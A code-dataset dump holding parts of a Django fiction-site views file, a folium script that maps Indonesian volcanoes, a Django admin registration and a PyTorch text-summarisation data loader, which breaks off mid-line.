context_instance=RequestContext(request))\n response.status_code = 404\n return response\n\n\ndef story_feed(request, story):\n story = Story.objects.get(slug=story)\n rss = Element('rss')\n rss.set(\"version\",\"2.0\")\n\n channel = SubElement(rss,'channel')\n\n title = SubElement(channel,'title')\n title.text = story.title\n\n link = SubElement(channel,'link')\n link.text = \"http://fictionhub.io/story/\"+story.slug # request.build_absolute_uri(reverse(\"story\"))\n\n desc = SubElement(channel,'description')\n desc.text = story.description\n\n chapters = story.chapters.all()\n\n for index in chapters:\n item = SubElement(channel,'item')\n\n title_c = SubElement(item,'title')\n title_c.text = index.title\n \n link = SubElement(item,'link')\n #link.text = request.build_absolute_uri(index.get_absolute_url())\n link.text = \"http://fictionhub.io/story/\"+story.slug\n return HttpResponse(tostring(rss, encoding='UTF-8'), content_type='application/xml')\n\n\n# Story API. Replace with REST.\ndef story_json(request, slug):\n try:\n story = Story.objects.get(slug=slug)\n except:\n return HttpResponseRedirect('/404')\n\n res = {}\n res['title'] = story.title\n res['author'] = story.author.username\n res['chapters'] = []\n chapters = story.chapters.all()\n\n for index in chapters:\n res['chapters'].append({\"title\": index.title, \"number\": index.number, \"text\": index.body})\n\n return HttpResponse(json.dumps(res), content_type='application/json')\n\n\n# import feed\ndef feed_import(request, username):\n feed = feedparser.parse(\"http://orangemind.io/feeds/all.atom.xml\")\n\n author = request.user\n \n for entry in feed.entries:\n import_entry = False\n # Check if story has \"fictionhub\" in it's tags\n if \"tags\" in entry.keys():\n for tag in entry.tags:\n if tag.term == \"fictionhub\":\n import_entry = True\n if import_entry:\n title = entry.title\n slug = entry.link.rsplit('/',1)[-1]\n description = entry.description\n date = datetime.fromtimestamp(mktime(entry.updated_parsed)) \n try:\n # Open existing story\n post = Story.objects.get(slug=slug)\n except:\n # Import story\n post = Story(slug=slug)\n post.score = 1\n \n post.title = title\n post.description = description\n post.date = date\n post.author = author\n for tag in entry.tags:\n # post.title = post.title + \" \" + tag.term\n try:\n hub = Hub.objects.get(slug=tag.term)\n post.hubs.add(hub)\n except:\n pass\n post.imported = True\n post.published = True\n post.save(slug=slug)\n return HttpResponse()\n", "sub_path": "fictionhub/stories/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 20814, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "models.Story.objects.filter", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 45, "usage_type": "name"}, {"api_name": "hubs.models.Hub.objects.get", "line_number": 48, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "hubs.models.Hub", "line_number": 48, "usage_type": "name"}, {"api_name": "models.Story.objects.filter", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 52, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 55, "usage_type": "call"}, {"api_name": "profiles.models.User", "line_number": 55, "usage_type": "argument"}, {"api_name": "models.Story.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 58, "usage_type": "name"}, {"api_name": "models.Story.objects.filter", "line_number": 60, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 60, "usage_type": "name"}, {"api_name": "models.Story.objects.filter", "line_number": 63, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 63, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 63, "usage_type": "name"}, {"api_name": "utils.rank_hot", "line_number": 67, "usage_type": "call"}, {"api_name": "utils.rank_top", "line_number": 69, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 77, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 81, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 84, "usage_type": "name"}, {"api_name": "hubs.forms", "line_number": 100, "usage_type": "name"}, {"api_name": "hubs.models.Hub.objects.all", "line_number": 100, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects", "line_number": 100, "usage_type": "attribute"}, {"api_name": "hubs.models.Hub", "line_number": 100, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 102, "usage_type": "call"}, {"api_name": "hubs.forms", "line_number": 112, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 117, "usage_type": "call"}, {"api_name": "models.Story", "line_number": 117, "usage_type": "argument"}, {"api_name": "django.http.HttpResponse", "line_number": 125, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 128, "usage_type": "call"}, {"api_name": "models.Story", "line_number": 128, "usage_type": "argument"}, {"api_name": "django.http.HttpResponse", "line_number": 137, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 140, "usage_type": "call"}, {"api_name": "models.Story", "line_number": 140, "usage_type": "argument"}, {"api_name": "django.http.HttpResponse", "line_number": 148, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 151, "usage_type": "call"}, {"api_name": "models.Story", "line_number": 151, "usage_type": "argument"}, {"api_name": "django.http.HttpResponse", "line_number": 159, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 163, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 163, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 163, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 165, "usage_type": "call"}, {"api_name": "models.Chapter.objects.get", "line_number": 169, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 169, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 169, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 176, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 176, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 176, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 179, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 179, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 179, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 184, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 184, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 184, "usage_type": "name"}, {"api_name": "hubs.forms", "line_number": 193, "usage_type": "name"}, {"api_name": "comments.forms.CommentForm", "line_number": 196, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 208, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 210, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 213, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 215, "usage_type": "call"}, {"api_name": "comments.forms.CommentForm", "line_number": 218, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects.filter", "line_number": 238, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 238, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 238, "usage_type": "name"}, {"api_name": "comments.models.Comment.objects.filter", "line_number": 242, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 242, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 242, "usage_type": "name"}, {"api_name": "comments.models.Comment.objects.filter", "line_number": 247, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 247, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 247, "usage_type": "name"}, {"api_name": "comments.models.Comment.objects.filter", "line_number": 251, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 251, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 251, "usage_type": "name"}, {"api_name": "utils.rank_hot", "line_number": 257, "usage_type": "call"}, {"api_name": "utils.rank_top", "line_number": 259, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects.get", "line_number": 268, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 268, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 268, "usage_type": "name"}, {"api_name": "comments.utils", "line_number": 273, "usage_type": "name"}, {"api_name": "comments.utils.get_comment_list", "line_number": 273, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 282, "usage_type": "call"}, {"api_name": "comments.utils", "line_number": 292, "usage_type": "name"}, {"api_name": "hubs.forms", "line_number": 295, "usage_type": "name"}, {"api_name": "models.Story.objects.get", "line_number": 301, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 301, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 301, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 302, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 302, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 302, "usage_type": "name"}, {"api_name": "comments.utils", "line_number": 303, "usage_type": "name"}, {"api_name": "comments.models.Comment.objects.filter", "line_number": 303, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 303, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 303, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 306, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 306, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 306, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 311, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 311, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 311, "usage_type": "name"}, {"api_name": "hubs.forms", "line_number": 315, "usage_type": "name"}, {"api_name": "comments.forms.CommentForm", "line_number": 318, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 326, "usage_type": "call"}, {"api_name": "comments.forms.CommentForm", "line_number": 328, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 337, "usage_type": "call"}, {"api_name": "comments.utils", "line_number": 344, "usage_type": "name"}, {"api_name": "hubs.forms", "line_number": 346, "usage_type": "name"}, {"api_name": "forms.StoryForm", "line_number": 352, "usage_type": "call"}, {"api_name": "hubs.forms", "line_number": 361, "usage_type": "name"}, {"api_name": "hubs.forms", "line_number": 362, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 371, "usage_type": "call"}, {"api_name": "forms.StoryForm", "line_number": 373, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects.filter", "line_number": 374, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects", "line_number": 374, "usage_type": "attribute"}, {"api_name": "hubs.models.Hub", "line_number": 374, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 376, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects.all", "line_number": 378, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects", "line_number": 378, "usage_type": "attribute"}, {"api_name": "hubs.models.Hub", "line_number": 378, "usage_type": "name"}, {"api_name": "models.Story.objects.get", "line_number": 383, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 383, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 383, "usage_type": "name"}, {"api_name": "forms.ChapterForm", "line_number": 385, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 392, "usage_type": "call"}, {"api_name": "forms.ChapterForm", "line_number": 394, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 396, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 404, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 404, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 404, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 408, "usage_type": "call"}, {"api_name": "forms.StoryForm", "line_number": 411, "usage_type": "call"}, {"api_name": "hubs.forms", "line_number": 417, "usage_type": "name"}, {"api_name": "hubs.forms", "line_number": 418, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 421, "usage_type": "call"}, {"api_name": "forms.StoryForm", "line_number": 423, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects.filter", "line_number": 424, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects", "line_number": 424, "usage_type": "attribute"}, {"api_name": "hubs.models.Hub", "line_number": 424, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 426, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 433, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 433, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 433, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 434, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 434, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 434, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 438, "usage_type": "call"}, {"api_name": "forms.ChapterForm", "line_number": 441, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 445, "usage_type": "call"}, {"api_name": "forms.ChapterForm", "line_number": 447, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 449, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 457, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 457, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 457, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 458, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 458, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 458, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 462, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 474, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 477, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 477, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 477, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 478, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 478, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 478, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 482, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 495, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 498, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 498, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 498, "usage_type": "name"}, {"api_name": "models.Chapter.objects.get", "line_number": 499, "usage_type": "call"}, {"api_name": "models.Chapter.objects", "line_number": 499, "usage_type": "attribute"}, {"api_name": "models.Chapter", "line_number": 499, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 503, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 506, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 509, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 509, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 509, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 513, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 516, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 519, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 519, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 519, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 523, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 527, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 530, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 530, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 530, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 534, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 538, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 544, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 545, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 551, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 551, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 551, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 552, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 555, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 557, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 560, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 563, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 569, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 571, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.SubElement", "line_number": 574, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 577, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.tostring", "line_number": 577, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 583, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 583, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 583, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 585, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 596, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 596, "usage_type": "call"}, {"api_name": "feedparser.parse", "line_number": 601, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 616, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 616, "usage_type": "name"}, {"api_name": "time.mktime", "line_number": 616, "usage_type": "call"}, {"api_name": "models.Story.objects.get", "line_number": 619, "usage_type": "call"}, {"api_name": "models.Story.objects", "line_number": 619, "usage_type": "attribute"}, {"api_name": "models.Story", "line_number": 619, "usage_type": "name"}, {"api_name": "models.Story", "line_number": 622, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects.get", "line_number": 632, "usage_type": "call"}, {"api_name": "hubs.models.Hub.objects", "line_number": 632, "usage_type": "attribute"}, {"api_name": "hubs.models.Hub", "line_number": 632, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 639, "usage_type": "call"}]} +{"seq_id": "258880923", "text": "import folium\nimport pandas\n\ndata = pandas.read_csv(\"gunung.txt\")\nlat = list(data[\"LAT\"])\nlon = list(data[\"LON\"])\ntinggi = list(data[\"TINGGI\"])\nnama = list(data[\"NAMA\"])\n\ndef warna(tinggi):\n\tif tinggi < 1000:\n\t\treturn 'green'\n\telif 1000 < tinggi < 3000:\n\t\treturn 'orange'\n\telse:\n\t\treturn 'red'\n\nmap = folium.Map(location=[-0.526024, 113.693822], zoom_start=5.4, tiles=\"Mapbox Bright\")\nfg = folium.FeatureGroup(name=\"Indonesia\")\n\nfor lt, ln, t, n in zip(lat,lon, tinggi, nama):\n\tfg.add_child(folium.CircleMarker(location=[lt,ln], radius=6, popup=n+\"\\n\"+str(t), fill_color=warna(t), color='grey',fill_opacity=1 ))\n\nmap.add_child(fg)\nmap.save(\"peta-gunung-berapi-indonesia.html\")", "sub_path": "gunung-berapi-indonesia.py", "file_name": "gunung-berapi-indonesia.py", "file_ext": "py", "file_size_in_byte": 676, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 4, "usage_type": "call"}, {"api_name": "folium.Map", "line_number": 18, "usage_type": "call"}, {"api_name": "folium.FeatureGroup", "line_number": 19, "usage_type": "call"}, {"api_name": "folium.CircleMarker", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "598056034", "text": "from django.contrib import admin\nfrom .models import Doodles\n\n\nclass DoodlesAdmin(admin.ModelAdmin):\n list_display = (\n \"name\",\n \"price\",\n \"size\",\n \"time_to_complete\",\n \"image\",\n \"created_at\",\n \"updated_at\",\n )\n ordering = (\"-updated_at\",)\n\n\nadmin.site.register(Doodles, DoodlesAdmin)\n", "sub_path": "doodles/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 343, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 5, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Doodles", "line_number": 18, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "378603654", "text": "#/usr/bin/env python\n# -*- coding: utf-8 -*-\n#pylint: skip-file\nimport sys\nimport os\nimport numpy as np\nimport encodings\nimport pkgutil\nimport torch\nfrom nltk.corpus import stopwords\n\ncurr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))\n# for paragraph position\npar_const = 0.5\npar_bar = 4\nforgotten_punct= ['-lrb-', '-rrb-']\ndef all_encodings():\n\tmodnames = set(\n\t\t[modname for importer, modname, ispkg in pkgutil.walk_packages(\n\t\t\tpath=[os.path.dirname(encodings.__file__)], prefix='')])\n\taliases = set(encodings.aliases.aliases.values())\n\treturn modnames.union(aliases)\n\t\ndef load_stop_words():\n return stopwords.words('english')\n\ndef load(f_path):\n\tdic = {}\n\ti2w = {}\n\tw2i = {}\n\tlines = []\n\tw_pos = []\n\t# w_concept = []\n\n\t# load dic\n\tencodings = all_encodings()\n\t# for enc in encodings:\n\t\t# try:\n\t\t\t# with open(filename, encoding=enc) as f:\n\t\t\t\t# # print the encoding and the first 500 characters\n\t\t\t\t# print(enc, f.read(500))\n\t\t# except Exception:\n\t\t\t# pass\n\tchosen_encodings = []\n\tfor enc in encodings:\n\t\ttry:\n\t\t\tf = open(f_path + \".dic\", \"r\", encoding=enc)\n\t\t\tfor line in f:\n\t\t\t\tline\n\t\t\tchosen_encodings.append(enc)\n\t\texcept Exception:\n\t\t\tpass\n\t\t\t\n\t\n\tf = open(f_path + \".dic\", \"r\", encoding=chosen_encodings[0])\n\tfor line in f:\n\t\tline = line.strip('\\n')\n\t\tfields = line.split(\"=====\")\n\t\tif len(fields) < 2:\n\t\t\tprint(\"Error.\")\n\t\t\tcontinue\n\t\tdic[fields[0]] = float(fields[1])\n\t\ti2w[len(w2i)] = fields[0]\n\t\tw2i[fields[0]] = len(w2i)\n\tf.close()\n\n\t# load sents\n\tf = open(f_path + \".sent\", \"r\", encoding=chosen_encodings[0])\n\ti = 0\n\tsent = 0\n\tfor line in f:\n\t\tline = line.strip('\\n')\n\t\ti += 1\n\t\tif '***' in line:\n\t\t\t# sent += 1\n\t\t\t# if sent > 10: break\n\t\t\tcontinue\n\t\tlines.append(line)\n\tf.close()\n\n\t# num_x = len(lines)\n\n\t# load bows\n\t# sents = np.zeros((num_x, len(w2i)), dtype = theano.config.floatX) \n\tsents = list()\n\tf = open(f_path + \".tf\", \"r\", encoding=chosen_encodings[0])\n\ti = 0\n\tfor line in f:\n\t\tsent = torch.zeros(len(w2i), dtype=torch.float)\n\t\tline = line.strip('\\n')\n\t\ttfs = line.split(\"|\")\n\t\ti += 1\n\t\tif '***' in line:\n\t\t\tcontinue\n\t\tfor tf in tfs:\n\t\t\tfields = tf.split(\"=====\")\n\t\t\tif len(fields) < 2:\n\t\t\t\t#print \"Error.tf\"\n\t\t\t\tcontinue\n\t\t\tif fields[0] in forgotten_punct: continue\n\t\t\tsent[w2i[fields[0]]] = float(fields[1])\n\t\tsents.append(sent)\n\n\tnum_x = len(sents)\n\tsents = torch.stack(sents)\n\n\tf.close()\n\t#normalization\n\tfor i in range(num_x):\n\t\tnorm2 = torch.norm(sents[i, :])\n\t\tif norm2 == 0:\n\t\t\tnorm2 = 1\n\t\tsents[i, :] = sents[i, :] / norm2\n\n\t# load entities\n\t# entities = np.zeros((1, len(w2i)), dtype = theano.config.floatX)\n\tentities = torch.zeros((1, len(w2i)), dtype = torch.float)\n\tf = open(f_path + \".entities\", \"r\", encoding=chosen_encodings[0])\n\tfor line in f:\n\t\tline = line.strip('\\n')\n\t\tfields = line.split(\"=====\")\n\t\tif len(fields) < 2:\n\t\t\tprint(\"Error.entities\")\n\t\t\tcontinue\n\t\tentities[0, w2i[fields[0]]] = float(fields[1])\n\tf.close()\n\tentities = entities / torch.norm(entities)\n\n\t# load weights\n\t# f = open(f_path + \".weight\", \"r\")\n\t# for line in f:\n\t\t# line = line.strip('\\n')\n\t\t# fields = line.split()\n\t\t# if len(fields) < 2:\n\t\t\t# print(\"Error.weight\")\n\t\t\t# continue\n\t\t# w_pos.append(float(fields[0]))\n\t\t# w_concept.append(float(fields[1]))\n\t# f.close()\n\n\treturn i2w, w2i, sents, lines, w_pos, entities\n\n\ndef word_sequence(f_path, batch_size = 1):\n\tstop_words = load_stop_words()\n\tseqs = []\n\ti2w = {}\n\tw2i = {}\n\tlines = []\n\ttf = {}\n\tpara_info = []\n\n\ttmp_sents = []\n\tlast_sents = []\n\n\tf = open(curr_path + \"/\" + f_path, \"r\")\n\tparagraph_now = 0\n\tfor line in f:\n\t\tline = line.strip('\\n').lower()\n\t\twords = line.split()\n\n\t\tif line == \"====\":\n\t\t\tparagraph_now = 0\n\t\t\tcontinue\n\t\tif len(words) < 3:\n\t\t\tif len(words) == 0 and paragraph_now < par_bar:\n\t\t\t\tparagraph_now += 1\n\t\t\tcontinue\n\t\twords.append(\"\") # end symbol\n\t\twords.append(\"\") \n\t\ttmp_sents.append(line)\n\t\tlines.append(words)\n\t\tpara_info.append(paragraph_now)\n\t\tfor w in words:\n\t\t\tif w not in w2i:\n\t\t\t\ti2w[len(w2i)] = w\n\t\t\t\tw2i[w] = len(w2i)\n\t\t\t\ttf[w] = 1\n\t\t\telse:\n\t\t\t\ttf[w] += 1\n\tf.close()\n\n\tnum_x = len(lines) \n\t#num_x = 30\n\tfor i in xrange(len(para_info)):\n\t\tpara_info[i] = par_const ** para_info[i]\n\t# represent sentences with word-bag model\n\t# sents = np.zeros((num_x, len(w2i)), dtype = theano.config.floatX) # row: each sentence\n\tsents = torch.zeros((num_x, len(w2i)), dtype=torch.float)\n\tfor i in range(0, num_x):\n\t\tlast_sents.append(tmp_sents[i])\n\n\t\teach_sent = lines[i]\n\t\t# x = np.zeros((len(each_sent), len(w2i)), dtype = theano.config.floatX) # row: each word position\n\t\tx = torch.zeros((len(each_sent), len(w2i)), dtype = torch.float) # row: each word position\n\t\tfor j in range(0, len(each_sent)):\n\t\t\teach_word = each_sent[j]\n\t\t\tx[j, w2i[each_word]] = 1\n\t\t\tif each_word not in stop_words:\n\t\t\t\tsents[i, w2i[each_word]] += 1\n\n\t\tseqs.append(x)\n\tseqs = torch.stack(seqs)\n\n\t#normalization\n\tfor i in xrange(num_x):\n\t\tnorm2 = torch.norm(sents[i, :])\n\t\tif norm2 == 0:\n\t\t\tnorm2 = 1\n\t\tsents[i, :] = sents[i, :] / norm2\n\n\n\tdata_xy = batch_sequences(seqs, i2w, w2i, para_info, batch_size)\n\tprint(\"#dic = \" + str(len(w2i)))\n\treturn seqs, i2w, w2i, data_xy, sents, last_sents\n\ndef batch_sequences(seqs, i2w, w2i, paragraph_info, batch_size):\n\tdata_xy = {}\n\tbatch_x = []\n\tbatch_y = []\n\tbatch_paragraph_info = []\n\tseqs_len = []\n\tbatch_id = 0\n\tdim = len(w2i)\n\t# zeros_m = np.zeros((1, dim), dtype = theano.config.floatX)\n\tzeros_m = torch.zeros((1, dim), dtype = torch.float)\n\tfor i in xrange(len(seqs)):\n\t\tseq = seqs[i]\n\t\tX = seq[0 : len(seq) - 1, ]\n\t\tY = seq[1 : len(seq), ]\n\t\tbatch_x.append(X)\n\t\tseqs_len.append(X.shape[0])\n\t\tbatch_y.append(Y)\n\t\tbatch_paragraph_info.append(paragraph_info[i])\n\n\t\tif len(batch_x) == batch_size or (i == len(seqs) - 1):\n\t\t\t# tmp_sum = float(sum(batch_paragraph_info))\n\t\t\t# batch_paragraph_info = [(lambda x : x / tmp_sum)(x) for x in batch_paragraph_info]\n\n\t\t\tmax_len = np.max(seqs_len)\n\t\t\t# mask = np.zeros((max_len, len(batch_x)), dtype = theano.config.floatX)\n\t\t\tmask = torch.zeros((max_len, len(batch_x)), dtype = torch.float)\n\n\t\t\t# concat_X = np.zeros((max_len, len(batch_x) * dim), dtype = theano.config.floatX)\n\t\t\tconcat_X = torch.zeros((max_len, len(batch_x) * dim), dtype = torch.float)\n\t\t\tconcat_Y = concat_X.copy()\n\t\t\tfor b_i in xrange(len(batch_x)):\n\t\t\t\tX = batch_x[b_i]\n\t\t\t\tY = batch_y[b_i]\n\t\t\t\tmask[0 : X.shape[0], b_i] = 1\n\t\t\t\tfor r in xrange(max_len - X.shape[0]):\n\t\t\t\t\tX = np.concatenate((X, zeros_m), axis=0)\n\t\t\t\t\tY = np.concatenate((Y, zeros_m), axis=0)\n\t\t\t\tconcat_X[:, b_i * dim : (b_i + 1) * dim] = X \n\t\t\t\tconcat_Y[:, b_i * dim : 